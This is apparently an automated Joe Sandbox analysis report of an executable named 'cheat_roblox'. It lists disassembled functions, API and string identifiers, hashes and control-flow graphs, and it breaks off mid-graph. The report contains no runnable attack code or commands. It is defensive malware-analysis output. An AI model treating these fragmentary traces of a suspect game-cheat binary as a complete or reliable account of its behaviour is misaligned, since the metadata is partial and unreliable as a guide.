                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                                                  • String ID: PNG
                                                                                                                  • API String ID: 541704414-364855578
                                                                                                                  • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                                                  • Instruction ID: 448487534cd5bfea93cfc74a2b28d10ce0613cb3f897d064cd80a122a0e79218
                                                                                                                  • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                                                  • Instruction Fuzzy Hash: 81418427A09B0691EF048B26E44437967A1BF88BD1F040435DDADC73A4EF7EE445C396
                                                                                                                  Function 00007FF6E7E1F930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: __tmp_reference_source_
                                                                                                                  • API String ID: 3668304517-685763994
                                                                                                                  • Opcode ID: c76355c9baf2e66e4a3ef320a7fc713a0968ab52b41ecee3f9f8e165b183ab49
                                                                                                                  • Instruction ID: 53d7fe03d816f7904e34d04aa3597797a9d8495b17f629e2266e3a0192787114
                                                                                                                  • Opcode Fuzzy Hash: c76355c9baf2e66e4a3ef320a7fc713a0968ab52b41ecee3f9f8e165b183ab49
                                                                                                                  • Instruction Fuzzy Hash: BEE2B363A096C292EA64CB25E1413FE6761FB81784F404132DBED83AE5CF3EE555C70A
                                                                                                                  Function 00007FF6E7E14840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: CMT
                                                                                                                  • API String ID: 3668304517-2756464174
                                                                                                                  • Opcode ID: 1de83cc682e1a1985b3aba301812ad60c5dac5995a71caddbb8804aac8f80fc4
                                                                                                                  • Instruction ID: a5205434f7802f94aa2f653702adc380cdf3c6912b64036c47a5aaed7c614924
                                                                                                                  • Opcode Fuzzy Hash: 1de83cc682e1a1985b3aba301812ad60c5dac5995a71caddbb8804aac8f80fc4
                                                                                                                  • Instruction Fuzzy Hash: 13E20F23B0868286EB18DB74D4523FE67A1FB45784F400035DAAE87796DF3EE459C34A
                                                                                                                  Function 00007FF6E7E240BC Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 3478 7ff6e7e240bc-7ff6e7e240f3 3479 7ff6e7e240f9-7ff6e7e24101 3478->3479 3480 7ff6e7e241d2-7ff6e7e241df FindNextFileW 3478->3480 3481 7ff6e7e24106-7ff6e7e24118 FindFirstFileW 3479->3481 3482 7ff6e7e24103 3479->3482 3483 7ff6e7e241e1-7ff6e7e241f1 GetLastError 3480->3483 3484 7ff6e7e241f3-7ff6e7e241f6 3480->3484 3481->3484 3485 7ff6e7e2411e-7ff6e7e24146 call 7ff6e7e26a0c 3481->3485 3482->3481 3486 7ff6e7e241ca-7ff6e7e241cd 3483->3486 3487 7ff6e7e241f8-7ff6e7e24200 3484->3487 3488 7ff6e7e24211-7ff6e7e24253 call 7ff6e7e4797c call 7ff6e7e1129c call 7ff6e7e28090 3484->3488 3500 7ff6e7e24167-7ff6e7e24170 3485->3500 3501 7ff6e7e24148-7ff6e7e24164 FindFirstFileW 3485->3501 3489 7ff6e7e242eb-7ff6e7e2430e call 7ff6e7e42320 3486->3489 3491 7ff6e7e24202 3487->3491 3492 7ff6e7e24205-7ff6e7e2420c call 7ff6e7e120b0 3487->3492 3514 7ff6e7e2428c-7ff6e7e242e6 call 7ff6e7e2f168 * 3 3488->3514 3515 7ff6e7e24255-7ff6e7e2426c 3488->3515 3491->3492 3492->3488 3503 7ff6e7e241a9-7ff6e7e241ad 3500->3503 3504 7ff6e7e24172-7ff6e7e24189 3500->3504 3501->3500 3503->3484 3506 7ff6e7e241af-7ff6e7e241be GetLastError 3503->3506 3507 7ff6e7e2418b-7ff6e7e2419e 3504->3507 3508 7ff6e7e241a4 call 7ff6e7e4220c 3504->3508 3512 7ff6e7e241c8 3506->3512 3513 7ff6e7e241c0-7ff6e7e241c6 3506->3513 3507->3508 3509 7ff6e7e24315-7ff6e7e2431b call 7ff6e7e47904 3507->3509 3508->3503 3512->3486 3513->3486 3513->3512 3514->3489 3517 7ff6e7e24287 call 7ff6e7e4220c 3515->3517 3518 7ff6e7e2426e-7ff6e7e24281 3515->3518 3517->3514 3518->3517 3521 7ff6e7e2430f-7ff6e7e24314 call 7ff6e7e47904 3518->3521 3521->3509
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 474548282-0
                                                                                                                  • Opcode ID: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
                                                                                                                  • Instruction ID: 56b6637f748f7b1ceefb39fe11b0149a8950d78dee9cf489463e869a17a0b8a0
                                                                                                                  • Opcode Fuzzy Hash: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
                                                                                                                  • Instruction Fuzzy Hash: 1561B163B08B8681EA109B29E84036D7361FB867A4F505331EAFD83AD9DF3DD985C705
                                                                                                                  Function 00007FF6E7E15E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: CMT
                                                                                                                  • API String ID: 0-2756464174
                                                                                                                  • Opcode ID: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
                                                                                                                  • Instruction ID: 555d93a38845fd1177c1613d7c3bfeef1deb07d51f6bb8ab7dec53fde9621d53
                                                                                                                  • Opcode Fuzzy Hash: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
                                                                                                                  • Instruction Fuzzy Hash: 3242DD23B0868297EB18DBB4C1523FD67A0AB11348F400136DBAE9769BDF3DE559C346
                                                                                                                  Function 00007FF6E7E31F20 Relevance: .3, Instructions: 337COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9760fb6421b16e0e583802a284a649d5527ae7ea6cefd943f702fc6b6a5a6041
                                                                                                                  • Instruction ID: a304112b8a35cea975e20adb746f504ead81fe58f190a36b75e7fc4f6620ca2a
                                                                                                                  • Opcode Fuzzy Hash: 9760fb6421b16e0e583802a284a649d5527ae7ea6cefd943f702fc6b6a5a6041
                                                                                                                  • Instruction Fuzzy Hash: F0E1F263A083829AEB64CF29E0483BD7790FB46748F054135DBEE87795DE3EE5428709
                                                                                                                  Function 00007FF6E7E33484 Relevance: .3, Instructions: 302COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 342467450e98b7b75b466d1eafea627c07b1293b3fd099ee508e1bce11d9ebd7
                                                                                                                  • Instruction ID: 8174da38b95654901ac738453826bbe77926d735a97c04cff0346596b3fd9b9e
                                                                                                                  • Opcode Fuzzy Hash: 342467450e98b7b75b466d1eafea627c07b1293b3fd099ee508e1bce11d9ebd7
                                                                                                                  • Instruction Fuzzy Hash: EEB1EFA3B04AC9A2DE18CB66D508BE96391B705FC4F448032DEAD8B751DF3DE155C306
                                                                                                                  Function 00007FF6E7E24928 Relevance: .1, Instructions: 136COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3340455307-0
                                                                                                                  • Opcode ID: 9f1cbd0ae3de128b3baec150e1e4cd931595298ca254ea0b004e55239e899349
                                                                                                                  • Instruction ID: 6e91df742088199d3b45aaf69c75509688bcc4708b92477261814e5c1297ee2f
                                                                                                                  • Opcode Fuzzy Hash: 9f1cbd0ae3de128b3baec150e1e4cd931595298ca254ea0b004e55239e899349
                                                                                                                  • Instruction Fuzzy Hash: 29412623B157D786FAA4DF25E90176A2252FBC5784F044030DE9E87794DE3DE8438709
                                                                                                                  Function 00007FF6E7E2DFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440libraryfileloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 7ff6e7e2dfd0-7ff6e7e2e024 call 7ff6e7e42450 GetModuleHandleW 3 7ff6e7e2e026-7ff6e7e2e039 GetProcAddress 0->3 4 7ff6e7e2e07b-7ff6e7e2e3a5 0->4 7 7ff6e7e2e03b-7ff6e7e2e04a 3->7 8 7ff6e7e2e053-7ff6e7e2e066 GetProcAddress 3->8 5 7ff6e7e2e3ab-7ff6e7e2e3b4 call 7ff6e7e4b788 4->5 6 7ff6e7e2e503-7ff6e7e2e521 call 7ff6e7e26454 call 7ff6e7e27df4 4->6 5->6 14 7ff6e7e2e3ba-7ff6e7e2e3fd call 7ff6e7e26454 CreateFileW 5->14 20 7ff6e7e2e525-7ff6e7e2e52f call 7ff6e7e251a4 6->20 7->8 8->4 11 7ff6e7e2e068-7ff6e7e2e078 8->11 11->4 21 7ff6e7e2e4f0-7ff6e7e2e4fe CloseHandle call 7ff6e7e11fa0 14->21 22 7ff6e7e2e403-7ff6e7e2e416 SetFilePointer 14->22 27 7ff6e7e2e531-7ff6e7e2e53c call 7ff6e7e2dd88 20->27 28 7ff6e7e2e564-7ff6e7e2e5ac call 7ff6e7e4797c call 7ff6e7e1129c call 7ff6e7e28090 call 7ff6e7e11fa0 call 7ff6e7e232bc 20->28 21->6 22->21 25 7ff6e7e2e41c-7ff6e7e2e43e ReadFile 22->25 25->21 29 7ff6e7e2e444-7ff6e7e2e452 25->29 27->28 39 7ff6e7e2e53e-7ff6e7e2e562 CompareStringW 27->39 71 7ff6e7e2e5b1-7ff6e7e2e5b4 28->71 32 7ff6e7e2e458-7ff6e7e2e4ac call 7ff6e7e4797c call 7ff6e7e1129c 29->32 33 7ff6e7e2e800-7ff6e7e2e807 call 7ff6e7e42624 29->33 50 7ff6e7e2e4c3-7ff6e7e2e4d9 call 7ff6e7e2d0a0 32->50 39->28 42 7ff6e7e2e5bd-7ff6e7e2e5c6 39->42 42->20 45 7ff6e7e2e5cc 42->45 48 7ff6e7e2e5d1-7ff6e7e2e5d4 45->48 52 7ff6e7e2e5d6-7ff6e7e2e5d9 48->52 53 7ff6e7e2e63f-7ff6e7e2e642 48->53 60 7ff6e7e2e4db-7ff6e7e2e4eb call 7ff6e7e11fa0 * 2 50->60 61 7ff6e7e2e4ae-7ff6e7e2e4be call 7ff6e7e2dd88 50->61 58 7ff6e7e2e5dd-7ff6e7e2e62d call 7ff6e7e4797c call 7ff6e7e1129c call 7ff6e7e28090 call 7ff6e7e11fa0 call 7ff6e7e232bc 52->58 56 7ff6e7e2e648-7ff6e7e2e65b call 7ff6e7e27eb0 call 7ff6e7e251a4 53->56 57 7ff6e7e2e7c2-7ff6e7e2e7ff call 7ff6e7e11fa0 * 2 call 7ff6e7e42320 53->57 82 7ff6e7e2e706-7ff6e7e2e753 call 7ff6e7e2da98 AllocConsole 56->82 83 7ff6e7e2e661-7ff6e7e2e701 call 7ff6e7e2dd88 * 2 call 7ff6e7e2aae0 call 7ff6e7e2da98 call 7ff6e7e2aae0 call 7ff6e7e2dc2c call 7ff6e7e387ac call 7ff6e7e119e0 56->83 107 7ff6e7e2e63c 58->107 108 7ff6e7e2e62f-7ff6e7e2e638 58->108 60->21 61->50 72 7ff6e7e2e5b6 71->72 73 7ff6e7e2e5ce 71->73 72->42 73->48 94 7ff6e7e2e7b0 82->94 95 7ff6e7e2e755-7ff6e7e2e7aa GetCurrentProcessId AttachConsole call 7ff6e7e2e868 call 7ff6e7e2e858 GetStdHandle WriteConsoleW Sleep FreeConsole 82->95 97 7ff6e7e2e7b4-7ff6e7e2e7bb call 7ff6e7e119e0 ExitProcess 83->97 94->97 95->94 107->53 108->58 112 7ff6e7e2e63a 108->112 112->53
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                                  • API String ID: 1496594111-2013832382
                                                                                                                  • Opcode ID: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                                                                                                                  • Instruction ID: 24d26aa3dbdb766de544b8e6a3b38cedfb5a54baf1221095d68c1a4921161bd8
                                                                                                                  • Opcode Fuzzy Hash: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                                                                                                                  • Instruction Fuzzy Hash: A3324B32A09B8699EB118F20F8402E933A4FF44354F500236DAED877A5EF3EE659C345
                                                                                                                  Function 00007FF6E7E298DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E28E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6E7E28F8D
                                                                                                                  • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6E7E29F75
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E2A42F
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E2A435
                                                                                                                    • Part of subcall function 00007FF6E7E30BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E7E30B44), ref: 00007FF6E7E30BE9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                                  • API String ID: 3629253777-3268106645
                                                                                                                  • Opcode ID: a0ca64e2e6ce2865254327ea7649ce479d77a76cd71c28d6026bad56dc47627e
                                                                                                                  • Instruction ID: aff57d07b275ea1e88e26f8a150b7e5e63beff869fe5c007bb282d1726d169f4
                                                                                                                  • Opcode Fuzzy Hash: a0ca64e2e6ce2865254327ea7649ce479d77a76cd71c28d6026bad56dc47627e
                                                                                                                  • Instruction Fuzzy Hash: 1362DF63B1868391EB10DB24D4443BD23A5FB40788F805532DAAEA76D5EF3EE945C34A
                                                                                                                  Function 00007FF6E7E41900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1910 7ff6e7e41900-7ff6e7e41989 call 7ff6e7e41558 1913 7ff6e7e4198b-7ff6e7e419af call 7ff6e7e41868 RaiseException 1910->1913 1914 7ff6e7e419b4-7ff6e7e419d1 1910->1914 1920 7ff6e7e41bb8-7ff6e7e41bd5 1913->1920 1916 7ff6e7e419e6-7ff6e7e419ea 1914->1916 1917 7ff6e7e419d3-7ff6e7e419e4 1914->1917 1919 7ff6e7e419ed-7ff6e7e419f9 1916->1919 1917->1919 1921 7ff6e7e419fb-7ff6e7e41a0d 1919->1921 1922 7ff6e7e41a1a-7ff6e7e41a1d 1919->1922 1930 7ff6e7e41b89-7ff6e7e41b93 1921->1930 1931 7ff6e7e41a13 1921->1931 1923 7ff6e7e41ac4-7ff6e7e41acb 1922->1923 1924 7ff6e7e41a23-7ff6e7e41a26 1922->1924 1925 7ff6e7e41acd-7ff6e7e41adc 1923->1925 1926 7ff6e7e41adf-7ff6e7e41ae2 1923->1926 1927 7ff6e7e41a28-7ff6e7e41a3b 1924->1927 1928 7ff6e7e41a3d-7ff6e7e41a52 LoadLibraryExA 1924->1928 1925->1926 1932 7ff6e7e41ae8-7ff6e7e41aec 1926->1932 1933 7ff6e7e41b85 1926->1933 1927->1928 1934 7ff6e7e41aa9-7ff6e7e41ab2 1927->1934 1928->1934 1935 7ff6e7e41a54-7ff6e7e41a67 GetLastError 1928->1935 1940 7ff6e7e41bb0 call 7ff6e7e41868 1930->1940 1941 7ff6e7e41b95-7ff6e7e41ba6 1930->1941 1931->1922 1938 7ff6e7e41b1b-7ff6e7e41b2e GetProcAddress 1932->1938 1939 7ff6e7e41aee-7ff6e7e41af2 1932->1939 1933->1930 1944 7ff6e7e41abd 1934->1944 1945 7ff6e7e41ab4-7ff6e7e41ab7 FreeLibrary 1934->1945 1942 7ff6e7e41a69-7ff6e7e41a7c 1935->1942 1943 7ff6e7e41a7e-7ff6e7e41aa4 call 7ff6e7e41868 RaiseException 1935->1943 1938->1933 1949 7ff6e7e41b30-7ff6e7e41b43 GetLastError 1938->1949 1939->1938 1946 7ff6e7e41af4-7ff6e7e41aff 1939->1946 1952 7ff6e7e41bb5 1940->1952 1941->1940 1942->1934 1942->1943 1943->1920 1944->1923 1945->1944 1946->1938 1950 